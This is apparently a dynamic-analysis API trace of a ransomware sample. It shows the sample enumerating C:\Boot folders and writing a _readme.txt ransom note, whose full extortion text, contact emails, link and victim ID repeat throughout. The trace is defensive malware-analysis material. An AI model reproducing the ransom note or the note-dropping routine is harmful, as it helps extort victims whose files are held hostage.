WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.637] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.637] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.638] CloseHandle (hObject=0x690) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.638] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.638] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.638] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.638] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e48cf40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.638] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e48cf40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.638] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.638] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.641] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0173.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.641] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.641] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.641] PathFindFileNameW (pszPath="") returned="" [0173.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.641] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.642] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.642] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.642] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.642] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0173.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.642] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0173.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.642] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.643] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.643] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.643] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 